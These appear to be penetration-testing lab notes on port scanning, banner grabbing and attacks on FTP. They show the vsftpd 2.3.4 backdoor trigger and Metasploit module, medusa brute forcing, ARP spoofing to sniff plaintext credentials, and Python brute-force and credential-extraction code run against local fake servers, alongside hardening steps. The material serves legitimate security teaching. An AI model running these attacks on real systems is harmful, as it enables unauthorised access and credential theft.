Port classification: the port range is 0-65535.
TCP ports and UDP ports: TCP and UDP are independent protocols, so their port numbers are independent of each other. TCP can have a port 235 and UDP can also have a port 235; the two do not conflict.
Ports fall into three ranges:
1 Well-known ports, 0 to 1023. Port 80 is assigned to the WWW service, 21 to the FTP service, and so on. You do not need to type a port number in the browser address bar because the WWW service uses port 80 by default.
2 Dynamic ports, 49152 to 65535. They are called dynamic because they are not fixed to a particular service but are allocated on demand.
3 Registered ports
Ports 1024 to 49151 are assigned to user processes or applications, mostly programs installed by the user.
Port banner grabbing
1 nmap: use Nmap to query a port on the specified host and return its banner
nmap <IP> --script banner -p <port>
root@kali:~# nmap localhost -p 22 --script banner
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-04-26 23:45 CST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00017s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE
22/tcp open ssh
|_banner: SSH-2.0-OpenSSH_6.7p1 Debian-5
Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds
2 dmitry -pb <IP>
root@kali:~# dmitry -pb 192.168.43.62
Deepmagic Information Gathering Tool
"There be some deep magic going on"
ERROR: Unable to locate Host Name for 192.168.43.62
Continuing with limited modules
HostIP:192.168.43.62
HostName:
Gathered TCP Port information for 192.168.43.62
---------------------------------
Port State
22/tcp open
>> SSH-2.0-OpenSSH_7.4
111/tcp open
3 Use netcat to grab the banner
nc -vn <IP> <port>
A port range works as well: nmap <IP> --script banner -p 20-30
Service version detection
Use Nmap to retrieve the version of the service running on a port
nmap -p <port> -sV <IP>
First run a plain banner scan for comparison:
root@kali:~# nmap --script banner 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-04 21:24 CST
Nmap scan report for 192.168.43.63
Host is up (0.00031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
|_banner: SSH-2.0-OpenSSH_7.4
111/tcp open rpcbind
6000/tcp open X11
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 12.56 seconds
root@kali:~# nmap -sV 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-04 21:27 CST
Nmap scan report for 192.168.43.63
Host is up (0.00019s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)   <- the matching version information
111/tcp open rpcbind 2-4 (RPC #100000)
6000/tcp open X11 (access denied)
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
Service Info: OS: Unix
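As an added example (not code from the original notes, and not nmap's own logic), the following Python does by hand what the two nmap runs above do: connect, read whatever the service sends first, and match that banner against a table of version signatures. The SIGNATURES table is a small hand-written assumption covering only the banners seen in these notes (nmap's nmap-service-probes database is far larger), and serve_banner is a constructed local test server so the example runs offline.

```python
import re
import socket
import threading

# Added example, not from the original notes: a minimal banner grabber and a
# banner-to-version parser in the spirit of "nmap --script banner" and "nmap -sV".
# SIGNATURES is a small hand-written table for the banners seen in these notes,
# not nmap's nmap-service-probes database; serve_banner is a constructed test
# server so the example runs offline.

SIGNATURES = [  # (service, regex with a "product" group and an optional "version" group)
    ("ssh", re.compile(r"^SSH-[\d.]+-(?P<product>OpenSSH)_(?P<version>[\w.]+)")),
    ("ftp", re.compile(r"^220 \((?P<product>vsFTPd) (?P<version>[\d.]+)\)")),
    ("ftp", re.compile(r"^220 (?P<product>Microsoft FTP Service)")),
]


def grab_banner(host, port, timeout=3.0, probe=b"\r\n"):
    """Connect and let the server speak first (SSH, FTP and SMTP do). If it stays
    silent, send a harmless probe and read once more; '' means no banner at all."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            data = s.recv(1024)
        except socket.timeout:
            s.sendall(probe)
            try:
                data = s.recv(1024)
            except socket.timeout:
                data = b""
    return data.decode("latin-1", "replace").split("\r\n")[0].strip()


def parse_banner(banner):
    """Map a banner to (service, product, version). A banner is self-reported and can
    be edited by the administrator, so treat the result as a hint, never as proof."""
    for service, rx in SIGNATURES:
        m = rx.match(banner)
        if m:
            groups = m.groupdict()
            return service, groups.get("product"), groups.get("version")
    return "unknown", None, None


def identify(host, port, timeout=3.0):
    """What a scanner does per open port: grab, then classify."""
    return parse_banner(grab_banner(host, port, timeout))


def serve_banner(banner, silent_until_probed=False):
    """Constructed one-shot localhost server for the example; returns its port.
    With silent_until_probed=True it behaves like a service that waits for the client."""
    srv = socket.create_server(("127.0.0.1", 0))

    def run():
        conn, _ = srv.accept()
        with conn, srv:
            if silent_until_probed:
                conn.recv(16)  # wait for the client's probe before answering
            conn.sendall(banner)

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    print(identify("127.0.0.1", serve_banner(b"SSH-2.0-OpenSSH_7.4\r\n")))
```

The two-step read in grab_banner matters in practice: protocols where the server speaks first give up their banner for free, while HTTP-style services say nothing until prompted, which is why a plain connect-and-read scan reports empty banners for them. nmap -sV handles this with a large library of protocol-specific probes; the single CRLF here is the simplest stand-in.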
Operating system detection
Use Nmap to fingerprint the operating system of the specified host
nmap -O <IP>
root@kali:~# nmap -O 192.168.43.99
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-04 21:44 CST
Nmap scan report for 192.168.43.99
Host is up (0.0000070s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh   <- the open port
Device type: general purpose
Running: Linux 3.X   <- the target is running Linux
OS CPE: cpe:/o:linux:linux_kernel:3   <- the operating system kernel
OS details: Linux 3.7 - 3.18
Network Distance: 0 hops
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.32 seconds
Full scan (version detection, OS detection, script scanning and traceroute in one run)
During an authorized test, nmap -A can be used to run a complete scan against the target:
nmap -A -v <IP>
nmap -A -v -T4 <IP>
root@kali:~# nmap -A -v -T4 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-04 21:52 CST
NSE: Loaded 122 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Initiating ARP Ping Scan at 21:52
Scanning 192.168.43.63 [1 port]
Completed ARP Ping Scan at 21:52, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:52
Completed Parallel DNS resolution of 1 host. at 21:52, 0.07s elapsed
Initiating SYN Stealth Scan at 21:52
Scanning 192.168.43.63 [1000 ports]
Discovered open port 111/tcp on 192.168.43.63
Discovered open port 22/tcp on 192.168.43.63
Discovered open port 6000/tcp on 192.168.43.63
Completed SYN Stealth Scan at 21:52, 1.45s elapsed (1000 total ports)
Initiating Service scan at 21:52
Scanning 3 services on 192.168.43.63
Completed Service scan at 21:52, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.63
NSE: Script scanning 192.168.43.63.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.90s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Nmap scan report for 192.168.43.63
Host is up (0.00037s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 bf:c0:28:65:3e:ff:7f:fc:49:d1:05:c3:76:83:90:09 (RSA)
|_ 256 58:06:c2:6f:b6:4c:8d:d9:43:7d:91:85:08:4a:ed:0e (ECDSA)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
|_ 100000 2,3,4 111/udp rpcbind
6000/tcp open X11 (access denied)
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 0.018 days (since Tue May 4 21:26:37 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.43.63
NSE: Script Post-scanning.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.64 seconds
Raw packets sent: 1130 (52.200KB) | Rcvd: 1120 (47.212KB)
How vulnerability scanning works
A vulnerability scanner checks whether a specific target is affected by a specific vulnerability. Scanners also produce false positives, so the results must be verified by hand.
All scanners work in roughly the same way: they send a probe to the target service and compare the response with the response a vulnerable version would give. If the two match, the vulnerability is reported as present.
First install an FTP server running vsftpd 2.3.4 (this version is the vulnerable target used below)
wget http://xiazai.xiazaiba.com/Soft/V/vsftpd-2.3.4.tar.gz
If vsftpd is already installed on the system, remove it first
------------------------------------------------
mkdir /usr/share/empty
useradd -s /sbin/nologin -d /var/ftp ftp
useradd nobody
chown root:root /var/ftp
chmod og-w /var/ftp
#the above is the pre-installation preparation
-------------------------------------------------
tar zxvf vsftpd-2.3.4.tar.gz
#unpack
cd vsftpd-2.3.4
#enter the directory
cat builddefs.h to see which features are enabled by default; for more detail read the INSTALL file (more INSTALL)
undef means the feature is disabled
define means the feature is enabled
#ifndef VSF_BUILDDEFS_H
#define VSF_BUILDDEFS_H
#define VSF_BUILD_TCPWRAPPERS
#define VSF_BUILD_PAM
#undef VSF_BUILD_SSL
#endif /* VSF_BUILDDEFS_H */
-----------------------------------------
#encoding workaround: disable the "OPTS UTF8 ON" handling so clients fall back to the server's default encoding
vi opts.c
change if (str_equal_text(&p_sess->ftp_arg_str,"UTF8 ON")) to
if (str_equal_text(&p_sess->ftp_arg_str,"DISABLE UTF8 ON"))
Note: on a 64-bit system, change the lib path in vsf_findlibs.sh to lib64 before building:
sed -i 's/lib\//lib64\//g' vsf_findlibs.sh
----------------------------------------------
Now compile and install
make && make install
If the build prints no errors, the installation succeeded
Next copy a few files into place
cp vsftpd.conf /etc #main configuration file
cp RedHat/vsftpd.pam /etc/pam.d/ftp #PAM authentication file
--------------------------------
Start vsftpd
/usr/local/sbin/vsftpd &
Check that it is listening
netstat -tnl | grep 21
Vulnerability scanning tools: nmap can also scan for vulnerabilities
nmap --script vuln <IP>
-T4 can be added for a faster timing template
root@kali:~# nmap --script vuln -T4 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-04 22:04 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 192.168.43.99
| 192.168.43.63
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.43.63
Host is up (0.0031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
6000/tcp open X11
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 36.69 seconds
2. Scanning with Metasploit (msf)

In msfconsole, search for vsftpd
msf > search vsftpd
[!] Database not connected or cache not built, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/interact normal Unix Command, Interact with Established Connection
msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > set rhost 192.168.43.80
rhost => 192.168.43.80
msf exploit(vsftpd_234_backdoor) > set rport 21
rport => 21
msf exploit(vsftpd_234_backdoor) > show options
msf exploit(vsftpd_234_backdoor) > exploit
[*] Banner: 220 Microsoft FTP Service
[*] USER: 331 Password required
The banner shows a Microsoft FTP Service rather than vsFTPd 2.3.4, so this module does not apply to 192.168.43.80: the vsftpd_234_backdoor exploit only works against the backdoored vsftpd 2.3.4 build.
Web application vulnerability scanning
Scanning an application for vulnerabilities means each scanner sends its own payloads to probe the target
1 OWASP ZAP 2 AWVS 3 AppScan 4 Nikto 5 Burp Suite; each scanner probes with its own payload set
OWASP ZAP is the web application vulnerability scanner released by the OWASP organization: free, open source and actively maintained
nikto -host <IP> scans the target server for vulnerabilities, mainly HTTP servers
1 Introduction to the FTP protocol
FTP (File Transfer Protocol) is a standard protocol for transferring files over a network. It uses the client-server model, belongs to the application layer, and its control channel uses port 21.
User types
1 Real users 2 Administrator 3 Anonymous user (anonymous); anonymous mode is enabled by default
FTP transfer modes
1 ASCII 2 Binary
Exploiting FTP anonymous login
If the FTP server does not disable anonymous users, you can log in directly as the anonymous user
Connecting to FTP with nc
① Steps
First use nmap to check whether port 21 is open
root@kali:~# nmap -p 21 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-16 20:48 CST
Nmap scan report for 192.168.43.63
Host is up (0.00063s latency).
PORT STATE SERVICE
21/tcp open ftp
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.99 seconds
② Run the nmap vulnerability scripts against the port
nmap --script vuln -p 21 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-16 20:48 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 192.168.43.99
| 192.168.43.63
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
③ Connect with nc
root@kali:~# nc 192.168.43.63 21
220 (vsFTPd 2.3.4)
USER anonymous   <- enter the anonymous user
331 Please specify the password.
PASS 123   <- enter any password
230 Login successful.   <- we are logged in
help
214-The following commands are recognized.
ABOR ACCT ALLO APPE CDUP CWD DELE EPRT EPSV FEAT HELP LIST MDTM MKD
MODE NLST NOOP OPTS PASS PASV PORT PWD QUIT REIN REST RETR RMD RNFR
RNTO SITE SIZE SMNT STAT STOR STOU STRU SYST TYPE USER XCUP XCWD XMKD
XPWD XRMD
214 Help OK.
pwd
257 "/"
421 Timeout.
Exploiting the FTP backdoor
The vsftpd 2.3.4 backdoor can be triggered by hand: during FTP authentication, if the USER argument contains :) , a shell listening on port 6200 is opened
① First use nmap to check whether port 6200 on the target is open
root@kali:~# nmap 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-16 21:04 CST
Nmap scan report for 192.168.43.63
Host is up (0.00030s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
111/tcp open rpcbind
6000/tcp open X11
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
The scan above shows that port 6200 is not open (only 21, 22, 111 and 6000 are)
② Then connect with nc
root@kali:~# nc 192.168.43.63 21
220 (vsFTPd 2.3.4)
USER user:)
530 This FTP server is anonymous only.
PASS 123
... Login with USER first.
421 Timeout.   <- the server only allows anonymous login, so the non-anonymous username is rejected
③ Now connect to port 6200 on the target with nc
root@kali:~# nc 192.168.43.63 6200
(UNKNOWN) [192.168.43.63] 6200 (?) : Connection refused   <- port 6200 is still not open
On a backdoored build, port 6200 would be open at this point
root@kali:~# nmap -p 6200 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-16 21:12 CST
Nmap scan report for 192.168.43.63
Host is up (0.00056s latency).
PORT STATE SERVICE
6200/tcp closed unknown
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
FTP hardening
1 Edit the configuration file to disable anonymous login (anonymous_enable=NO in vsftpd.conf)
2 Patch the specific vulnerability, or block connections to the backdoor port with the firewall
iptables -A INPUT -p tcp --dport 6200 -j DROP
iptables -A OUTPUT -p tcp --sport 6200 -j DROP
FTP username and password brute forcing
Add a user from the Windows cmd prompt and give it Administrator rights
1) net user <username> <password> /add
net localgroup administrators admin /add
Right-click the FTP directory, open Properties and grant the new admin user access
2) From the Kali terminal we can now log in with nc
root@kali:~# nc 192.168.43.70 21
220 Microsoft FTP Service
USER admin   <- the server2003 username
331 Password required for admin.
PASS admin   <- the server2003 password
230 User admin logged in.
421 Timeout (120 seconds): closing control connection.
421 Terminating connection.
Brute-forcing the FTP login with medusa
Syntax:
medusa -h 192.168.43.70 -u admin -P pass.txt -M ftp   (pass.txt is the password dictionary; fill it in beforehand and give it as an absolute path)
root@kali:~# medusa -h 192.168.43.70 -u admin -P /root/pass.txt -M ftp
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: dlafsl (1 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: sadfk (2 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: sadlfksad (3 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: wqerin (4 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: sadfnlsad (5 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: asdfnaslf (6 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: wqefpwnsd (7 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: saldfnsa (8 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: naflsdfnsladf (9 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: sadf a (10 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (11 of 13 complete)
ACCOUNT FOUND: [ftp] Host: 192.168.43.70 User: admin Password: admin [SUCCESS]   <- the username and password are recovered
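The anonymous-login check, the backdoor test and the medusa run above are all the same thing done by hand: open a control connection, send USER and PASS, read the reply code. The added example below (my code, not from the original notes or from vsftpd, medusa or Metasploit) automates the three against a constructed in-process fake FTP server so it runs offline. It also shows the point made under "How vulnerability scanning works": check_vsftpd_backdoor first matches the banner, as a signature scanner would, and then actively verifies by knocking on the shell port, so a host that merely reports "vsFTPd 2.3.4" (like 192.168.43.63 above, where 6200 stayed closed) is reported as a banner match only, not as confirmed. The fake server's imitation of the backdoor is simplified (it opens a bare listener rather than a shell, and does so regardless of anonymous-only mode); banners, credentials and ports are invented.

```python
import socket
import threading
import time

# Added example, not code from the original notes. fake_ftp_server is a constructed
# stand-in for the lab targets: it understands only USER and PASS and, with
# backdoored=True, imitates in simplified form the vsftpd 2.3.4 behaviour described
# above (a USER argument containing ":)" makes it listen on an extra port).
# Banners, credentials and port numbers here are invented for the example.

ANON = ("anonymous", "ftp")


def free_port():  # an unused localhost port, used as the simulated backdoor port
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def recv_line(sock):
    """One CRLF-terminated control line; returns '' once the peer has closed."""
    buf = b""
    while not buf.endswith(b"\r\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.decode("latin-1").rstrip("\r\n")


def fake_ftp_server(banner, anon_only=True, creds=None, backdoored=False, shell_port=0):
    """Serve control connections on an ephemeral localhost port; returns the port."""
    creds, state = creds or {}, {}
    srv = socket.create_server(("127.0.0.1", 0))

    def handle(conn):
        user = None
        with conn:
            conn.sendall(b"220 " + banner + b"\r\n")
            while True:
                cmd, _, arg = recv_line(conn).partition(" ")
                cmd = cmd.upper()
                if cmd == "USER":
                    if backdoored and ":)" in arg and "shell" not in state:
                        # the "shell" is only a listener here; the real backdoor served a shell
                        state["shell"] = socket.create_server(("127.0.0.1", shell_port))
                    ok = arg.lower() in ANON or not anon_only
                    user = arg if ok else None
                    conn.sendall(b"331 Please specify the password.\r\n" if ok
                                 else b"530 This FTP server is anonymous only.\r\n")
                elif cmd == "PASS":
                    ok = user is not None and (user.lower() in ANON or creds.get(user) == arg)
                    conn.sendall(b"230 Login successful.\r\n" if ok
                                 else b"530 Login incorrect.\r\n")
                else:  # QUIT, '' after the peer closed, or an unsupported verb
                    return

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def try_login(host, port, user, password, timeout=3.0):
    """USER/PASS by hand (the nc sessions above, automated); returns the final reply code."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        recv_line(s)  # 220 banner
        s.sendall(f"USER {user}\r\n".encode("latin-1"))
        reply = recv_line(s)
        if reply.startswith("331"):
            s.sendall(f"PASS {password}\r\n".encode("latin-1"))
            reply = recv_line(s)
    return int(reply[:3]) if reply[:3].isdigit() else 0


def brute_force(host, port, user, wordlist):  # what medusa does: one connection per guess
    return next((pw for pw in wordlist if try_login(host, port, user, pw) == 230), None)


def check_vsftpd_backdoor(host, port, shell_port=6200, timeout=2.0):
    """Stage 1 is what a signature scanner reports (banner matches a known-bad version);
    stage 2 is the verification the notes insist on: send USER with ':)' and knock on shell_port."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if "vsFTPd 2.3.4" not in recv_line(s):
            return "banner_not_matching"
        s.sendall(b"USER probe:)\r\n")
        recv_line(s)
        s.sendall(b"PASS probe\r\n")
        recv_line(s)
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:  # a real daemon may need a moment to listen
        try:
            with socket.create_connection((host, shell_port), timeout=0.2):
                return "backdoor_confirmed"
        except OSError:
            time.sleep(0.1)
    return "banner_match_only"
```

try_login("127.0.0.1", port, "anonymous", "123") reproduces the nc session (230 when anonymous is allowed); brute_force is the medusa loop with a Python list in place of pass.txt; and the three return values of check_vsftpd_backdoor map onto the outcomes seen in the notes: the Microsoft FTP host is "banner_not_matching", the anonymous-only 2.3.4 host where 6200 never opened is "banner_match_only", and only a host where the knock succeeds is "backdoor_confirmed".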
FTP credentials are sent in plaintext
During FTP authentication the client and server exchange the username and password in plaintext, so a login can be captured and read off the wire
1) First open Wireshark with the display filter ftp to capture the server2003 username and password
Check with ifconfig that Kali's network interface is eth0
Use arpspoof to perform ARP spoofing
root@kali:~# arpspoof -i eth0 -t 192.168.43.80 192.168.43.1   (-t 192.168.43.80 is the physical host being poisoned; 192.168.43.1 is the gateway whose address is spoofed)
0:c:29:f3:6e:61 c:54:15:80:86:85 0806 42: arp reply 192.168.43.1 is-at 0:c:29:f3:6e:61
0:c:29:f3:6e:61 c:54:15:80:86:85 0806 42: arp reply 192.168.43.1 is-at 0:c:29:f3:6e:61
0:c:29:f3:6e:61 c:54:15:80:86:85 0806 42: arp reply 192.168.43.1 is-at 0:c:29:f3:6e:61
2) Open a cmd prompt on the physical host (192.168.43.80)
C:\Users\23662>arp -a
Interface: 192.168.56.1 --- 0x6
  Internet Address      Physical Address      Type
  192.168.56.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
Interface: 192.168.20.1 --- 0xf
  Internet Address      Physical Address      Type
  192.168.20.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
Check the gateway's physical address in this table (the captured output is truncated here)
Then log in to the server2003 FTP server with the ftp command
C:\Users\23662>ftp 192.168.43.70
Connected to 192.168.43.70.
220 Microsoft FTP Service
530 Please login with USER and PASS.
User (192.168.43.70:(none)): admin   <- enter the username
331 Password required for admin.
Password: admin   <- enter the password
230 User admin logged in.
ftp>   <- logged in
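What Wireshark's ftp filter shows in the capture above can be pulled out programmatically; the added example below (my code, not from the original notes or from Wireshark) pairs each USER with the PASS that follows it on the same client-to-server flow and records the server's verdict. The capture is constructed for the example: the addresses match the lab notes but the packets are made up, and a second failed login is added to show how the 530 reply is handled.

```python
import re

# Added example, not from the original notes: extracting FTP credentials from a
# captured control channel, the same data Wireshark's "ftp" filter displays.
# CAPTURE is constructed for this example (addresses from the notes, bytes invented).

CAPTURE = [  # (src, dst, payload) in the order seen on the wire
    ("192.168.43.70", "192.168.43.80", "220 Microsoft FTP Service\r\n"),
    ("192.168.43.80", "192.168.43.70", "USER admin\r\n"),
    ("192.168.43.70", "192.168.43.80", "331 Password required for admin.\r\n"),
    ("192.168.43.80", "192.168.43.70", "PASS admin\r\n"),
    ("192.168.43.70", "192.168.43.80", "230 User admin logged in.\r\n"),
    ("192.168.43.80", "192.168.43.70", "USER guest\r\n"),
    ("192.168.43.70", "192.168.43.80", "331 Password required for guest.\r\n"),
    ("192.168.43.80", "192.168.43.70", "PASS letmein\r\n"),
    ("192.168.43.70", "192.168.43.80", "530 User cannot log in.\r\n"),
]

CMD = re.compile(r"(?i)^(USER|PASS) (.*)$")
VERDICT = re.compile(r"^(230|530|503)")  # 230 success; 530/503 rejected


def extract_ftp_credentials(packets):
    """Return one record per completed login attempt: who logged in where, with
    what, and whether the server accepted it. The password is the literal on-wire
    value, which is the whole point: nothing in FTP hides it."""
    pending = {}   # (client, server) -> username waiting for its PASS
    awaiting = {}  # (client, server) -> (user, password) waiting for the verdict
    results = []
    for src, dst, payload in packets:
        for line in filter(None, payload.split("\r\n")):
            m = CMD.match(line)
            if m:  # client -> server command
                cmd, arg, flow = m.group(1).upper(), m.group(2), (src, dst)
                if cmd == "USER":
                    pending[flow] = arg
                elif flow in pending:
                    awaiting[flow] = (pending.pop(flow), arg)
                continue
            flow = (dst, src)  # server -> client reply; key it by the client flow
            if flow in awaiting and VERDICT.match(line):
                user, password = awaiting.pop(flow)
                results.append({"client": dst, "server": src, "user": user,
                                "password": password, "success": line.startswith("230")})
    return results


if __name__ == "__main__":
    for rec in extract_ftp_credentials(CAPTURE):
        print(rec)
```

On a real capture the same function can be fed the reassembled TCP payloads of the control stream (tshark -Y ftp -T fields with the payload columns, for instance); the pairing logic is what makes it robust to interleaved sessions, because each attempt is tracked per client-server flow rather than by position in the file. Mitigation is protocol-level: FTPS or SFTP, not a stronger password.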
4 After a successful FTP login
Use Metasploit to create a reverse shell and upload it to the FTP server; setoolkit can generate the reverse shell quickly
cd into the .set directory and find payload.exe